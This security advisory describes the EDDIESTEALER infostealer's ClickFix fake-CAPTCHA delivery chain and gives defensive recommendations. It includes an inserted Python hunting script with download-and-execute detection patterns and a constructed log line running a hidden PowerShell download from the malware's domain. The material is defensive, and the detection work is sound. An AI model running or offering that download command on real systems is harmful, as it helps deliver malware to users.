Overview
Threat actors are actively distributing a new Rust-based information stealer dubbed EDDIESTEALER, leveraging a deceptive social engineering method known as ClickFix. The campaign initiates infection via fake CAPTCHA verification pages embedded into compromised legitimate websites, tricking users into executing malicious PowerShell commands manually.
This unconventional infection chain allows attackers to bypass traditional security mechanisms and gain access to sensitive user data and system credentials.
Key Technical Details
Initial Access Vector
- Malicious JavaScript (gverify.js) embedded in trusted websites poses as a CAPTCHA script.
- The fake CAPTCHA prompts users to launch Windows + R and execute a PowerShell command, effectively triggering the malware manually.
Execution & Payload
- The PowerShell script downloads EDDIESTEALER from llll[.]fit and saves it in the Downloads folder under a random name.
- The Rust-based binary performs:
- Credential harvesting
- Cookie and session data extraction
- System profiling
Stealth & Evasion
- Manual user interaction avoids traditional sandbox analysis.
- PowerShell-based delivery minimizes file detection footprints.
- Uses randomized file names and trusted websites to appear legitimate.
- Bypasses browser-level security by shifting execution responsibility to the OS layer.
Threat Implications
- Bypasses EDR and automated defense systems due to manual execution.
- High potential for mass infection due to abuse of real, popular websites.
- Rust’s complexity makes static analysis and reverse engineering difficult.
Threatcure Recommendations
1. User Awareness & Policy Enforcement
- Conduct targeted awareness training on social engineering tactics like ClickFix.
- Issue internal advisories warning against executing PowerShell commands from unknown sources—even if prompted by a website.
- Restrict PowerShell access for standard users where operationally feasible.
2. Endpoint and Network Protection
- Enforce endpoint policies that block unauthorized PowerShell execution.
- Monitor for unusual parent-child process relationships (e.g., browser → powershell.exe).
- Use EDR solutions with behavioral analytics that flag command-line initiated downloads.
3. Web & DNS Filtering
- Block or monitor outbound connections to known malicious domains such as llll[.]fit.
- Inspect JavaScript loaded from third-party domains, particularly gverify.js activity.
4. Threat Hunting & Detection
- Search logs for PowerShell commands executed shortly after browser activity.
- Look for downloaded files in the Downloads folder with randomized names matching Rust binaries.
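The two hunting points above, the browser → powershell.exe parent-child relationship from section 2 and PowerShell launched shortly after browser activity from section 4, can be turned into a small correlation script. The following is an added example and is not part of the Threatcure advisory. It runs over constructed Sysmon-style process-creation records (the field names UtcTime, Image, ParentImage, CommandLine and User, the browser process list and the command-line patterns are assumptions of this example); the only value taken from the advisory is the distribution domain llll[.]fit. It also covers the Windows + R case the advisory describes, where powershell.exe is a child of explorer.exe rather than of the browser, by correlating on time per user instead of on lineage alone.

```python
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Process names are assumptions for this example, not taken from the advisory.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Command-line fragments common in one-liner downloaders (assumed, not from the advisory).
SUSPICIOUS_CMD = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|invoke-expression|\biex\b"
    r"|-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|https?://)",
    re.IGNORECASE,
)
# Distribution domain named in the advisory (defanged there as llll[.]fit).
KNOWN_BAD_DOMAINS = ("llll.fit",)


def parse_event(line):
    """Normalise one Sysmon-style (Event ID 1) JSON record; field names are assumed."""
    ev = json.loads(line)
    return {
        "time": datetime.fromisoformat(ev["UtcTime"]),
        "image": ev["Image"].rsplit("\\", 1)[-1].lower(),
        "parent": ev["ParentImage"].rsplit("\\", 1)[-1].lower(),
        "cmd": ev.get("CommandLine", ""),
        "user": ev.get("User", ""),
    }


def score_event(ev, browser_times, window):
    """Return the reasons a process-creation event looks like a ClickFix launch."""
    reasons = []
    if ev["image"] not in POWERSHELL:
        return reasons
    if ev["parent"] in BROWSERS:
        reasons.append("powershell spawned directly by browser")
    elif ev["parent"] == "explorer.exe" and any(
        timedelta(0) <= ev["time"] - t <= window for t in browser_times
    ):
        # Windows + R runs the command under explorer.exe, not the browser,
        # so a pure lineage check misses it; correlate on time per user instead.
        reasons.append("powershell via Run dialog shortly after browser activity")
    if SUSPICIOUS_CMD.search(ev["cmd"]):
        reasons.append("download/execute primitives in command line")
    if any(d in ev["cmd"].lower() for d in KNOWN_BAD_DOMAINS):
        reasons.append("known EDDIESTEALER distribution domain in command line")
    return reasons


def detect(lines, window=timedelta(minutes=5)):
    """Scan JSON log lines; a finding is 'high' when two or more indicators agree."""
    events = sorted((parse_event(ln) for ln in lines if ln.strip()), key=lambda e: e["time"])
    browser_times = defaultdict(list)
    for ev in events:
        if ev["image"] in BROWSERS:
            browser_times[ev["user"]].append(ev["time"])
    findings = []
    for ev in events:
        reasons = score_event(ev, browser_times[ev["user"]], window)
        if reasons:
            findings.append({
                "time": ev["time"].isoformat(),
                "user": ev["user"],
                "cmd": ev["cmd"],
                "severity": "high" if len(reasons) >= 2 else "low",
                "reasons": reasons,
            })
    return findings


# Constructed sample log: alice opens Chrome, then follows a ClickFix prompt via Win+R;
# bob's browser spawns a harmless PowerShell; alice later opens a plain console.
SAMPLE_LOG = [
    r'{"UtcTime": "2025-01-01T12:00:00", "Image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "chrome.exe", "User": "CORP\\alice"}',
    r'{"UtcTime": "2025-01-01T12:01:30", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -w hidden -c iwr https://llll.fit/CONSTRUCTED-PATH", "User": "CORP\\alice"}',
    r'{"UtcTime": "2025-01-01T12:05:00", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "CommandLine": "powershell.exe -c Get-Date", "User": "CORP\\bob"}',
    r'{"UtcTime": "2025-01-01T12:30:00", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe", "User": "CORP\\alice"}',
]

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f["severity"].upper(), f["time"], f["user"], "|", "; ".join(f["reasons"]))
```

Using the browser's own process-creation event as the "browser activity" marker is a simplification; on a real estate the browser is usually long-running, so the time correlation should instead key on per-user DNS or web-proxy events, and the five-minute window should be tuned to the telemetry available. The plain console opened at 12:30 is not reported at all, and bob's browser-spawned PowerShell with an innocuous command line is reported only as low, which keeps the rule usable as a hunting query rather than a noisy alert.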
5. Incident Response Preparedness
- Simulate ClickFix-style phishing in red team or tabletop exercises.
- Develop and maintain YARA/Sigma rules for identifying EDDIESTEALER and related obfuscation techniques.
Conclusion
EDDIESTEALER’s distribution campaign highlights the growing convergence of advanced social engineering and manual execution techniques. The abuse of legitimate websites and the use of user-triggered scripts challenge conventional detection strategies.
Threatcure advises organizations to adopt a multi-layered defense approach that combines employee awareness, endpoint hardening, and real-time behavioral analysis to counteract evolving malware threats like EDDIESTEALER.